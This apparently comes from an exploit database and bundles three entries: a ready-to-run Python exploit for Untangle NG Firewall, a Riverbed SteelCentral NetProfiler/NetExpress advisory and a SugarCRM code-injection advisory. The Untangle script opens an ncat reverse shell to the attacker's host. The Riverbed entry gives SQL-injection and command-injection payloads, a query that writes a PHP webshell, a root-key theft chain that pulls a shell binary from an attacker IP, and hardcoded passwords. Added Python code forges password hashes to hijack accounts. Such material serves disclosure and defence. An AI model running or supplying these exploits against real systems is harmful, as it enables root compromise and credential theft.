https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40032.zip
#!/usr/bin/python
# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE: (Not yet assigned)
# Discovery: Matt Bush (@3xocyte)
# Exploit: Matt Bush
# Contact: mbush@themissinglink.com.au
# Disclosure Timeline:
# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016 US-CERT confirms contacting vendor
# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016 Public disclosure
# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
import json, requests, sys

if len(sys.argv) < 5:
    print("[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>")
    print("[!] and in a separate terminal: 'ncat --ssl -nlvp 443'")
    sys.exit()

print("\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit")
print(" by @3xocyte\n")

rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]

login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}

print("[*] Opening session...")
session = requests.Session()

# Log in through the form handler, then fetch the JSON-RPC nonce that every
# later call has to carry.
print("[*] Authenticating...")
try:
    login = session.post(login_url, data=auth)
    get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
    req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
    data = json.loads(req_nonce.text)
    nonce = data['result']
except:
    print("[!] Authentication failed. Quitting.")
    sys.exit()

# The web UI startup info hands out the server-side objectID of the ExecManager.
print("[*] Getting execManager objectID...")
try:
    get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
    req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
    data = json.loads(req_obj_id.text)
    object_id = data['result']['execManager']['objectID']
except:
    print("[!] Could not get execManager objectID. Quitting.")
    sys.exit()

# Call execEvil() on that object directly; its argument is run as a shell
# command by the root-owned uvm process.
print("[*] Exploiting Ung.Main.getExecManager().execEvil()...")
try:
    exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
    session.post(rpc_url, data=json.dumps(exploit))
except:
    print("[!] Exploit failed. Quitting.")
    sys.exit()

print("[*] Exploit sent!")
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7
PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘username’ POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the application’s
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.
The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the ‘users’
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).
[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {"username": "test%';INSERT INTO users (username, password, uid) VALUES (<user>, <SHA512 hash>, <random id>);--", "password": ""}
Additional SQL Injection vulnerabilities exist in the application’s web
interface and can be exploited after authentication.
Method => GET
URL => /popup.php?page=export_report
Parameter => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => GET
URL => /popup.php?page=algorithm_settings
Parameter => id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND ('Pdyu'='Pdyu
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--
All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.
[POC SQL INJECTION - WRITE WEBSHELL]
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3
==Command Injection==
Multiple command injection vulnerabilities exist in the appliances’ web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.
URL => GET /popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter => device
POC Payload => 1; touch /tmp/FILE;
URL => POST /index.php?page=licenses
Body => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes => Token Request functionality in 'Licenses' page
URL => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter => query
POC Payload => 1; touch /tmp/MYFILE;
URL => POST /index.php?page=network_config
Body => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Configure now' functionality, injection occurs after
appliance reboots.
URL => POST /index.php?page=product_info
Body => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Delete collected entry' functionality
==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The ‘apache’ user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:
/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*
The ‘mazu-run’ script can be used to invoke the /bin/date binary in the
context of the built-in ‘mazu’ user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the -f flag against a sensitive
file such as the root private SSH key. The ‘-f’ option instructs the
‘date’ binary to read each line of the file specified as a DATEFILE.
For every line that does not parse as a valid date, ‘date’ prints an
error message that echoes the offending line back, so the contents of
the file are disclosed line by line.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish an SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.
[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
-o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';
==Local File Inclusion==
A local file inclusion vulnerability exists in the
‘sensor/ta_loader.php’ file due to a lack of input sanitization for the
GET parameter ‘class’. This allows an attacker to read or include
arbitrary files.
As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the ‘Edit
/etc/hosts’ functionality available under
‘/index.php?page=network_config’ to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.
[POC LFI]
curl 'https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts'
==Account Hijacking==
The password change functionality under the
‘/index.php?page=security_compliance’ page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the ‘accountscredentialsid’ hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.
This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out on client-side against the
‘oldpassword’ field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length. Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the ‘oldpassword’ hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.
After clicking the ‘Configure Now’ button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.
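The "hash length" the advisory says must be recomputed is the byte-length prefix of a serialized PHP string (s:N:"..."); unserialize() rejects the blob if N does not match, so the substitution has to rewrite both the hash and that prefix. The Python below is an added example, not part of the advisory, that performs the substitution. The layout of the serialized object (an array keyed by account name, each holding the current hash under 'oldpassword') is an assumption, since the advisory does not show it, and the hash bodies in the sample are placeholders. A valid replacement hash in /etc/shadow format can be produced with a crypt(3) SHA-512 tool such as openssl passwd -6.

```python
import base64
import re


def php_str(s: str) -> str:
    """Serialize a PHP string as s:<byte length>:"<bytes>"; (length is bytes, not characters)."""
    return 's:%d:"%s";' % (len(s.encode()), s)


# Constructed sample in the shape described above; the real object's layout
# is not shown in the advisory, so this is an assumption, and the '$6$' hash
# bodies are placeholders rather than real credentials.
SAMPLE_OBJECT = (
    "a:2:{"
    + php_str("root") + "a:1:{" + php_str("oldpassword") + php_str("$6$saltroot$" + "A" * 86) + "}"
    + php_str("mazu") + "a:1:{" + php_str("oldpassword") + php_str("$6$saltmazu$" + "B" * 86) + "}"
    + "}"
)
SAMPLE_PARAM = base64.b64encode(SAMPLE_OBJECT.encode()).decode()

_LEN = re.compile(rb's:(\d+):"')


def decode_param(param_b64: str) -> str:
    """Base64-decode the hidden parameter to the serialized PHP text."""
    return base64.b64decode(param_b64).decode()


def _locate_string(blob: bytes, key: str, start: int = 0):
    """Find the serialized string stored under `key` at or after `start`.
    Returns (token_start, value_start, value_end): offsets of the whole
    s:N:"...": token and of the raw value inside it. The declared length N is
    honoured instead of scanning for a closing quote, which is how PHP's
    unserialize() reads it and keeps values containing quotes intact."""
    key_tok = php_str(key).encode()
    pos = blob.find(key_tok, start)
    if pos < 0:
        raise KeyError(key)
    m = _LEN.match(blob, pos + len(key_tok))
    if m is None:
        raise ValueError("value under %r is not a serialized string" % key)
    vstart = m.end()
    vend = vstart + int(m.group(1))
    if blob[vend:vend + 2] != b'";':
        raise ValueError("declared length does not match value under %r" % key)
    return m.start(), vstart, vend


def _account_offset(blob: bytes, account: str) -> int:
    pos = blob.find(php_str(account).encode())
    if pos < 0:
        raise KeyError(account)
    return pos


def get_oldpassword(param_b64: str, account: str) -> str:
    """Read the current hash stored for `account`."""
    blob = base64.b64decode(param_b64)
    _, vstart, vend = _locate_string(blob, "oldpassword", _account_offset(blob, account))
    return blob[vstart:vend].decode()


def set_oldpassword(param_b64: str, account: str, new_hash: str) -> str:
    """Replace the 'oldpassword' hash for `account` with new_hash, re-serialized
    with the correct byte length, and return the replacement base64 parameter."""
    blob = base64.b64decode(param_b64)
    tok_start, _, vend = _locate_string(blob, "oldpassword", _account_offset(blob, account))
    new_blob = blob[:tok_start] + php_str(new_hash).encode() + blob[vend + 2:]
    return base64.b64encode(new_blob).decode()


if __name__ == "__main__":
    # Placeholder hash standing in for the output of: openssl passwd -6 <chosen password>
    chosen = "$6$attacker$" + "C" * 80
    forged = set_oldpassword(SAMPLE_PARAM, "root", chosen)
    print(decode_param(forged))
```

Because the form compares the password the user types against whatever hash the client sends back, submitting the forged parameter together with the chosen "current" password passes the check for that account.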
==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.
Users => mazu, dhcp, root
Password => bb!nmp4y
The default ‘mazu’ user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.
+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral NetProfiler/NetExpress to version 10.9.0.
At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter ‘originalsettingsid’ when
browsing to ‘/index.php?page=security_compliance’.
+------------+
| Timeline |
+------------+
24/03/2016 – Initial disclosure to Riverbed.
25/03/2016 – Vendor confirms receipt of advisory.
18/04/2016 – Sent follow up email asking for a status update
19/04/2016 – Vendor replies engineering team is working on software patches.
13/06/2016 – Vendor releases patched software build.
27/06/2016 – Public Disclosure
+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------
[-] Software Link:
http://www.sugarcrm.com/
[-] Affected Versions:
Version 6.5.18 CE and prior versions.
[-] Vulnerabilities Description:
1) The vulnerable code is located in the /include/utils/array_utils.php script:
function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
    if (is_array($value)) {
        $str = '';
        $newArrayName = $array_name . "['$value_name']";
        foreach($value as $key=>$val) {
            $str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
        }
        return $str;
    } else {
        if(!$save_empty && empty($value)){
            return;
        }else{
            return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
        }
    }
}
The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:
http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1
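To make the injection concrete: PHP turns the query string parameter ext_rest_insideview_['.phpinfo().']=1 into an array whose only key is the string '.phpinfo().', and that key is interpolated raw into "['$value_name']" while the value goes through var_export(). The Python below is an added example, not SugarCRM's code or the vendor's patch: it ports the renderer, shows the line it emits for that key, and places a hardened variant beside it that quotes the key through a var_export() equivalent. The array name sugar_config and the value name used in the demonstration call are assumptions about how the Connectors module invokes the function.

```python
def php_var_export(value) -> str:
    """Mimic PHP's var_export() for the scalar types used here. Strings get
    single quotes with backslash and single quote escaped, which is what makes
    the key a literal instead of code."""
    if value is None:
        return "NULL"
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    if isinstance(value, str):
        return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"
    raise TypeError("unsupported type %r" % type(value))


def php_empty(value) -> bool:
    """PHP empty() for the values this example handles ('0' counts as empty)."""
    return value in (None, False, 0, "", "0") or value == [] or value == {}


def override_vulnerable(array_name, value_name, value, save_empty=True) -> str:
    """Port of override_value_to_string_recursive2(): the key is dropped into
    "['$value_name']" unescaped, so a key containing a quote breaks out of
    the literal and becomes PHP code in config_override.php."""
    if isinstance(value, dict):
        new_name = "%s['%s']" % (array_name, value_name)
        return "".join(override_vulnerable(new_name, k, v, save_empty) for k, v in value.items())
    if not save_empty and php_empty(value):
        return ""
    return "$%s['%s'] = %s;\n" % (array_name, value_name, php_var_export(value))


def override_hardened(array_name, value_name, value, save_empty=True) -> str:
    """Same renderer with the key quoted through php_var_export() as well
    (an illustrative hardening, not the change shipped in 6.5.19). A key of
    '.phpinfo().' now lands in the file as a harmless escaped string."""
    if isinstance(value, dict):
        new_name = "%s[%s]" % (array_name, php_var_export(str(value_name)))
        return "".join(override_hardened(new_name, k, v, save_empty) for k, v in value.items())
    if not save_empty and php_empty(value):
        return ""
    return "$%s[%s] = %s;\n" % (array_name, php_var_export(str(value_name)), php_var_export(value))


# What PHP builds from ext_rest_insideview_[%27.phpinfo().%27]=1 ($_GET values are strings).
INJECTED_PARAM = {"'.phpinfo().'": "1"}

if __name__ == "__main__":
    print(override_vulnerable("sugar_config", "ext_rest_insideview", INJECTED_PARAM), end="")
    print(override_hardened("sugar_config", "ext_rest_insideview", INJECTED_PARAM), end="")
```

The vulnerable renderer emits $sugar_config['ext_rest_insideview'][''.phpinfo().''] = '1'; and PHP evaluates the index expression '' . phpinfo() . '' when the file is included, which is the code execution. The hardened one emits $sugar_config['ext_rest_insideview']['\'.phpinfo().\''] = '1'; where the whole key is one string literal.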
2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script:
$manifest_file = extractManifest($tempFile);

if(is_file($manifest_file)) {
    require_once( $manifest_file );
The vulnerability is caused by the Upgrade Wizard module, which allows uploading a package with an arbitrary manifest.php
file that is then executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.
[-] Solution:
Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.
[-] Disclosure Timeline:
[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-05